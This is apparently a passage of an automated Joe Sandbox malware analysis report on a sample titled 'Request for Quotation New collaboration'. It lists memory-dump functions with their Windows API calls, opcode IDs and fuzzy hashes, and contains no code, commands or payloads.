                                                                                                                                  control_flow_graph 1102 38450850-384508e4 DuplicateHandle 1103 384508e6-384508ec 1102->1103 1104 384508ed-3845090a 1102->1104 1103->1104
                                                                                                                                  APIs
                                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 384508D7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837563871.0000000038450000.00000040.00000800.00020000.00000000.sdmp, Offset: 38450000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_38450000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DuplicateHandle
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3793708945-0
                                                                                                                                  • Opcode ID: e7bdb6f4a24534ce700afe6fea4a43cae48d3e1863b0bb013b18a20ac551591c
                                                                                                                                  • Instruction ID: a0c0207f5290d20156708f900b58c36db8dd352e3e2d2d26b8bfe3e526985077
                                                                                                                                  • Opcode Fuzzy Hash: e7bdb6f4a24534ce700afe6fea4a43cae48d3e1863b0bb013b18a20ac551591c
                                                                                                                                  • Instruction Fuzzy Hash: F021C4B5D00248AFDB10CFAAD984ADEFBF4EB48320F14841AE958A7350D374A954CFA5
                                                                                                                                  APIs
                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 3845D2B5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837563871.0000000038450000.00000040.00000800.00020000.00000000.sdmp, Offset: 38450000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_38450000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Initialize
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2538663250-0
                                                                                                                                  • Opcode ID: 2ef459d7c1bd2b63fec2499d8ff7ea9251740f7bafdbf09254df84673c568f66
                                                                                                                                  • Instruction ID: b6d5d0e43718b563a9f1706444c1e3358ff3c22f34d6b056472dbe71f4fa00a7
                                                                                                                                  • Opcode Fuzzy Hash: 2ef459d7c1bd2b63fec2499d8ff7ea9251740f7bafdbf09254df84673c568f66
                                                                                                                                  • Instruction Fuzzy Hash: 971103B59043489FDB20CFAAC544BDEFBF4AF48324F10846AE558A7710C378A944CFA5
                                                                                                                                  APIs
                                                                                                                                  • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,3845D79F), ref: 3845E5C5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837563871.0000000038450000.00000040.00000800.00020000.00000000.sdmp, Offset: 38450000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_38450000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DispatchMessage
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2061451462-0
                                                                                                                                  • Opcode ID: fd997414def66b6df55a027dd27fe751197f088b622e74c7f4fc173709335d46
                                                                                                                                  • Instruction ID: 7fee11533cce4f793e8c9977f3e84b666ab9159e8578c0bd02053f9ca73085f0
                                                                                                                                  • Opcode Fuzzy Hash: fd997414def66b6df55a027dd27fe751197f088b622e74c7f4fc173709335d46
                                                                                                                                  • Instruction Fuzzy Hash: A211E0B5C04749DFDB20CFAAD444BDEFBF4AB48324F10856AE458A7610D374A644CFA5
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837563871.0000000038450000.00000040.00000800.00020000.00000000.sdmp, Offset: 38450000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_38450000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Timer
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2870079774-0
                                                                                                                                  • Opcode ID: 8805119862d526d8aec24c38c4b698c7e194464e4d6ed5818fee6c02b9312f2f
                                                                                                                                  • Instruction ID: 0e449e3864eecd0340cc611451c806b139491c33aa069eacec29f0a180e551a6
                                                                                                                                  • Opcode Fuzzy Hash: 8805119862d526d8aec24c38c4b698c7e194464e4d6ed5818fee6c02b9312f2f
                                                                                                                                  • Instruction Fuzzy Hash: BA11E3B58042499FDB11CF99D985BDEBBF4EB48320F108459E558A7610C374A684CFA1
                                                                                                                                  APIs
                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 3845D2B5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837563871.0000000038450000.00000040.00000800.00020000.00000000.sdmp, Offset: 38450000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_38450000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Initialize
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2538663250-0
                                                                                                                                  • Opcode ID: f7ae6279f5f424f5fb99af8a51bd1a2ae09d69fc31b6ec101b254bd31dd9d368
                                                                                                                                  • Instruction ID: b0f3c157ef8211f027e859ba38348867a3864dd806b02c016767e45687d65d1a
                                                                                                                                  • Opcode Fuzzy Hash: f7ae6279f5f424f5fb99af8a51bd1a2ae09d69fc31b6ec101b254bd31dd9d368
                                                                                                                                  • Instruction Fuzzy Hash: ED1103B58003489FDB20CFAAC545BDEBBF4AF48324F10846AE558A7710D378A984CFA5
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837563871.0000000038450000.00000040.00000800.00020000.00000000.sdmp, Offset: 38450000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_38450000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Timer
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2870079774-0
                                                                                                                                  • Opcode ID: ead50d539a147b5217d43ced166e76a70f98034457b69c5a0db23b4dbdcbe387
                                                                                                                                  • Instruction ID: 8a5c0f048dd3ebacc114aeb7e97ab897df4b27be142b79df7cdb5838c99000e0
                                                                                                                                  • Opcode Fuzzy Hash: ead50d539a147b5217d43ced166e76a70f98034457b69c5a0db23b4dbdcbe387
                                                                                                                                  • Instruction Fuzzy Hash: 9A11E5B5800349DFDB10CF9AD985BDEFBF8EB48320F10841AE558A7610C375A584CFA5
                                                                                                                                  APIs
                                                                                                                                  • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,3845D79F), ref: 3845E5C5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837563871.0000000038450000.00000040.00000800.00020000.00000000.sdmp, Offset: 38450000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_38450000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DispatchMessage
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2061451462-0
                                                                                                                                  • Opcode ID: 14b40574011e534b5026b12c0aa5087a5ba1a10cbc322bebabaccd2b8f69e749
                                                                                                                                  • Instruction ID: b1be08370a7c142d889091849bd8fd5800242da7027ba0692f9bd6a063cc3da2
                                                                                                                                  • Opcode Fuzzy Hash: 14b40574011e534b5026b12c0aa5087a5ba1a10cbc322bebabaccd2b8f69e749
                                                                                                                                  • Instruction Fuzzy Hash: A411F5B5C04649DFDB20CFAAD444BDEFBF4EB48324F10856AD458A7610D374A544CFA6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837241314.0000000037EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37EE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_37ee0000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 3Y);^
                                                                                                                                  • API String ID: 0-2562898844
                                                                                                                                  • Opcode ID: 5de598092370b7ce8673157a81988fa230dc9c67e5d05f2bb967fa794ff74840
                                                                                                                                  • Instruction ID: 583c8c40d8c1e4ebc1cb19f7939108367ed9b09103448e10d66498a467e9fd62
                                                                                                                                  • Opcode Fuzzy Hash: 5de598092370b7ce8673157a81988fa230dc9c67e5d05f2bb967fa794ff74840
                                                                                                                                  • Instruction Fuzzy Hash: 8651AF70A042099FCB00DFA4D565AEEBBB2FF85300F1085A9D045BB262DB35AD45DF65
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837241314.0000000037EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37EE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_37ee0000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 4e0d2895793e4dbbdfb9534bf3dd04ea7a3a0015346b7d3bf0ee3498279ba062
                                                                                                                                  • Instruction ID: ea80a2ba43274dec6d577ac92eba9f2343bbe9e346ec7cba9561d9277fab81fe
                                                                                                                                  • Opcode Fuzzy Hash: 4e0d2895793e4dbbdfb9534bf3dd04ea7a3a0015346b7d3bf0ee3498279ba062
                                                                                                                                  • Instruction Fuzzy Hash: 5DE1A034A00218CFDB25DF64C894BADBBB2EF89301F5085A9990A77364CB395E92DF54
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837241314.0000000037EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37EE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_37ee0000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: ff7b3d90469c902a51648f6f864fb1be9bdc230a8d00ca433e8275da224f0618
                                                                                                                                  • Instruction ID: 0c240f443423273e1e4ceeab9f3c653463c8849ca91731459a6aa4713b79a95a
                                                                                                                                  • Opcode Fuzzy Hash: ff7b3d90469c902a51648f6f864fb1be9bdc230a8d00ca433e8275da224f0618
                                                                                                                                  • Instruction Fuzzy Hash: DAE1A034A00218CFDB25DF64C894BADBBB2EF89301F5085A9D90A77364CB395E92DF54
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837241314.0000000037EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37EE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_37ee0000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: ad77e3103bcb2330a1893d20b9f0ce08b66d04312ec34c74e652bd1c721f8fd6
                                                                                                                                  • Instruction ID: 1b456075aa42857d47367b850da21b92a8e32ffd3335dc400fbedbecb7ab4b00
                                                                                                                                  • Opcode Fuzzy Hash: ad77e3103bcb2330a1893d20b9f0ce08b66d04312ec34c74e652bd1c721f8fd6
                                                                                                                                  • Instruction Fuzzy Hash: E4918D74B007059FDB48DF79C49096EBBF6BF882607008A29D44ADBB51EB74ED428B94
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837241314.0000000037EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37EE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_37ee0000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 85cafcaa237ac52edefd14f23ddb0f4b26642e85c81bf9976dce34e91f720ff2
                                                                                                                                  • Instruction ID: f6134e25f679b62e02b7c7c3294baf415f3877a41eef308e0ca0190978b19966
                                                                                                                                  • Opcode Fuzzy Hash: 85cafcaa237ac52edefd14f23ddb0f4b26642e85c81bf9976dce34e91f720ff2
                                                                                                                                  • Instruction Fuzzy Hash: 4871F675A00319DFDB15DFB8C499AADBFB2BF88310F144629E406AB350DB389982DF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837241314.0000000037EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37EE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_37ee0000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 5b7768e85757d8251bd0218fe24fe45df9d711d8da52c1f109afd079da8f1372
                                                                                                                                  • Instruction ID: 3ebce617c766b38c115cf016581710f908aaff5e4f3c162639701bef22292798
                                                                                                                                  • Opcode Fuzzy Hash: 5b7768e85757d8251bd0218fe24fe45df9d711d8da52c1f109afd079da8f1372
                                                                                                                                  • Instruction Fuzzy Hash: 9B61C534A00258CFEB25DF60C894BADBB72FF88710F1084AA991A77764CB355D92DF18
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837241314.0000000037EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37EE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_37ee0000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 4c68ea694189524c46ea7edbd74e62cb47c95c8bf1dc407fbaf0be06a28a2551
                                                                                                                                  • Instruction ID: d021763f4d71cd0bbe49f4c8fbb9de8122ac05f35db633651e8559578e43e7ea
                                                                                                                                  • Opcode Fuzzy Hash: 4c68ea694189524c46ea7edbd74e62cb47c95c8bf1dc407fbaf0be06a28a2551
                                                                                                                                  • Instruction Fuzzy Hash: A4416A70E093849FE711CB74C45069D7FF9AF85324F4549ADD882ABA52CB30AD89CB91
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837241314.0000000037EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37EE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_37ee0000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: dc173e028b8cc39faa8d82c5f12e7277f5487a4c59f6a4e86781041fa98aef1a
                                                                                                                                  • Instruction ID: 4465d915239e1554de9a0e0870e40a3269bc9095b317a8b09fc7c69b03099b04
                                                                                                                                  • Opcode Fuzzy Hash: dc173e028b8cc39faa8d82c5f12e7277f5487a4c59f6a4e86781041fa98aef1a
                                                                                                                                  • Instruction Fuzzy Hash: 5851EF74D01318CFEB14DFA5D994BAEBBB2BF88300F208529D805AB2A4DB395946DF54
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837241314.0000000037EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37EE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_37ee0000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a4b38953b394762b09df064e8f7f192143650448848f4794646a8b16fba942ff
                                                                                                                                  • Instruction ID: 229734c2ba9f2b0500ac3230ecf66fc7d19b76099ec697fd9a7027a4c5c67958
                                                                                                                                  • Opcode Fuzzy Hash: a4b38953b394762b09df064e8f7f192143650448848f4794646a8b16fba942ff
                                                                                                                                  • Instruction Fuzzy Hash: E261A174E01258DFDB15DFA9C890A9DBBB2FF89300F208169D849BB365DB31A946DF40
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837241314.0000000037EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37EE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_37ee0000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e3ff6b91661b0666c37aebf71b9fd59b24de5a02cbbd70ef96eccdb9c6974e96
                                                                                                                                  • Instruction ID: 6471a27d545b02062cf29b1a0561c1f11df83e86bcaeae491a8a61efc6526481
                                                                                                                                  • Opcode Fuzzy Hash: e3ff6b91661b0666c37aebf71b9fd59b24de5a02cbbd70ef96eccdb9c6974e96
                                                                                                                                  • Instruction Fuzzy Hash: 11313674E093808FE725CB75C5906BEBFF65F89210F14889EC086E7A61DA34AC45CB61
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837241314.0000000037EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37EE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_37ee0000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b86243ac7025141ea617bdf06269e30024651c931e2243497e1a9c10f8d99f56
                                                                                                                                  • Instruction ID: b321234b6f54dfdf2b4438367970fa7efe79462eb5e1bc653c3dd5eb36362d28
                                                                                                                                  • Opcode Fuzzy Hash: b86243ac7025141ea617bdf06269e30024651c931e2243497e1a9c10f8d99f56
                                                                                                                                  • Instruction Fuzzy Hash: BB31C774A017058BEB24CF65D5907BFBBFA9F88714F14882DC486A7B80DF34A845CBA1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837241314.0000000037EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37EE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_37ee0000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d03bb4c37c98fb3f8b3094b9cdc3ffd7bc1a2bf61e1d1004745cf025d2a52ca7
                                                                                                                                  • Instruction ID: 0a40590c46e2b87f21ff61a9093cb7ea11a5716c565aaf9dca7d50cae7a8a922
                                                                                                                                  • Opcode Fuzzy Hash: d03bb4c37c98fb3f8b3094b9cdc3ffd7bc1a2bf61e1d1004745cf025d2a52ca7
                                                                                                                                  • Instruction Fuzzy Hash: 98315075B003188BEB15DF79C4546AE7FB6AF88310F14892DD416AB351DF389882CF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837241314.0000000037EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37EE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_37ee0000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: ad3a7ddf09a9d87683f51c8c14fb71671bfc53120b78b746bac3943e5d3fe13f
                                                                                                                                  • Instruction ID: be2c6935bd2e4f0a07c698ad180b3213119760aee002e373b38cf8a044aca85f
                                                                                                                                  • Opcode Fuzzy Hash: ad3a7ddf09a9d87683f51c8c14fb71671bfc53120b78b746bac3943e5d3fe13f
                                                                                                                                  • Instruction Fuzzy Hash: 6F313474C023189FDB04DFA5D8547EEBBB2BF89304F508829E815BB244DB794A4ADF60
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2809054307.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_ad000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 31499129ae9bf5b819bd8384ffaac03bc552925e727b054295ca08044a7669fb
                                                                                                                                  • Instruction ID: bb195f18e4981e62d2172f4e94566b755779dc2dc77274c31474967eab03209f
                                                                                                                                  • Opcode Fuzzy Hash: 31499129ae9bf5b819bd8384ffaac03bc552925e727b054295ca08044a7669fb
                                                                                                                                  • Instruction Fuzzy Hash: 9F21F271604204EFDB24DF94D980F26BBA1EB85314F24C56EE94A4B642C336D847CA62
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837241314.0000000037EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37EE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_37ee0000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 8b880a68a715c77c48bea6e38978be1d2d12f885fd88b4f174b41e9a9abdb04e
                                                                                                                                  • Instruction ID: 88a5c91d36ea43c6e106b655e5ad6d8f5f400ab9d0747a2e945bcee3df0980a3
                                                                                                                                  • Opcode Fuzzy Hash: 8b880a68a715c77c48bea6e38978be1d2d12f885fd88b4f174b41e9a9abdb04e
                                                                                                                                  • Instruction Fuzzy Hash: 5E210778D00609DFDB01DFA4D4986EDBFF1AF48310F1498AAD814B3290DB389A5ADF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837241314.0000000037EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37EE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_37ee0000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 20c13974d8358b656d57a4f586dd3aa7ce802b66b3a4ad2db3c42977f5c26c9d
                                                                                                                                  • Instruction ID: 8f2d204b514dd763e3ffddf5d265167db14384ec6b86abe26584085073b10fe6
                                                                                                                                  • Opcode Fuzzy Hash: 20c13974d8358b656d57a4f586dd3aa7ce802b66b3a4ad2db3c42977f5c26c9d
                                                                                                                                  • Instruction Fuzzy Hash: 2C21F478D10609DFDB00DFA4D4846EEBBF1FB48310F109869D910B3250DB389A56DF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2809054307.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_ad000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: bb3f6b3ea4c7f948b5930e0f5b35f24b9d5dc708ab96ac67f7f3367d8e482390
                                                                                                                                  • Instruction ID: 3776e716027ca7e64b3c22ea2bbd20db1bf3eef2a4ccf6c08f8bfbc2d1869473
                                                                                                                                  • Opcode Fuzzy Hash: bb3f6b3ea4c7f948b5930e0f5b35f24b9d5dc708ab96ac67f7f3367d8e482390
                                                                                                                                  • Instruction Fuzzy Hash: B011DD75504280DFCB11CF54D5C4B15FFB2FB85314F28C6AAD84A4BA56C33AD84ACB62
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837241314.0000000037EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37EE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_37ee0000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: ee3be0dce65679a2ad2c79dbf60284c10fb1e5d7e94ccb188f3c7fecc9d44d6c
                                                                                                                                  • Instruction ID: ce07ce72dd26e74f7910622ee09dd0248e7373cd1de1daf3044e2aa4fcc8aef1
                                                                                                                                  • Opcode Fuzzy Hash: ee3be0dce65679a2ad2c79dbf60284c10fb1e5d7e94ccb188f3c7fecc9d44d6c
                                                                                                                                  • Instruction Fuzzy Hash: 1711AD707006409FE315CF2ED450959BBF6AF8A21830686AEE04ACB732DB30EC85DB90
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837241314.0000000037EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37EE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_37ee0000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 649f84db690bce0a69bf00decb55dde97b2809ae12eca98b57d3dfd41cd8c7b7
                                                                                                                                  • Instruction ID: 11858e4c1c4460cf6df3b81a78c1616136dc9b254790cc3dfea7025763c09613
                                                                                                                                  • Opcode Fuzzy Hash: 649f84db690bce0a69bf00decb55dde97b2809ae12eca98b57d3dfd41cd8c7b7
                                                                                                                                  • Instruction Fuzzy Hash: 1C112530D0C3845FC712CFA488106AE7FF9AF42220F0405AFD489DBA52C7346558CBA2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837241314.0000000037EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37EE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_37ee0000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b940e1ba07840d9f6ee52e8d782218b25425caf5d4172eea3dc812e20dbec2e7
                                                                                                                                  • Instruction ID: ade941ca9ac0f5f4b186196285d4bc4814184bbde53989261c5ef357882feed3
                                                                                                                                  • Opcode Fuzzy Hash: b940e1ba07840d9f6ee52e8d782218b25425caf5d4172eea3dc812e20dbec2e7
                                                                                                                                  • Instruction Fuzzy Hash: 4E019E307006019FE314DF6ED48196AB7F6EF89764305896AE00ACB736EB70EC85DB91
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837241314.0000000037EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37EE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_37ee0000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 1a28f2c01f25c73d523858552da303f08784d60d758e07bd8ffae4e61540bd4b
                                                                                                                                  • Instruction ID: 52989fdfc0d7955ed6af6cac107be85df0cee1fe28f75040bb461acd59fef66f
                                                                                                                                  • Opcode Fuzzy Hash: 1a28f2c01f25c73d523858552da303f08784d60d758e07bd8ffae4e61540bd4b
                                                                                                                                  • Instruction Fuzzy Hash: BD018F34D06644DFDB04DFB4E8546EDBBB5EFCA301F509869C40073221DB359951CB61
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837241314.0000000037EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37EE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_37ee0000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6d8157748997a84d9fa3ae9c317ba4a721b51a962bff5e75db2c08fe72d194ee
                                                                                                                                  • Instruction ID: 2c367037d568322ddc72b89799559d509b0ff1d83804aa8b5685738d307e0ba6
                                                                                                                                  • Opcode Fuzzy Hash: 6d8157748997a84d9fa3ae9c317ba4a721b51a962bff5e75db2c08fe72d194ee
                                                                                                                                  • Instruction Fuzzy Hash: 3EF03734D01608CFDB44DFA9E8446EDBBB6EFCA301F209829C804B3250DB3A9952CF65
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837241314.0000000037EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37EE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_37ee0000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
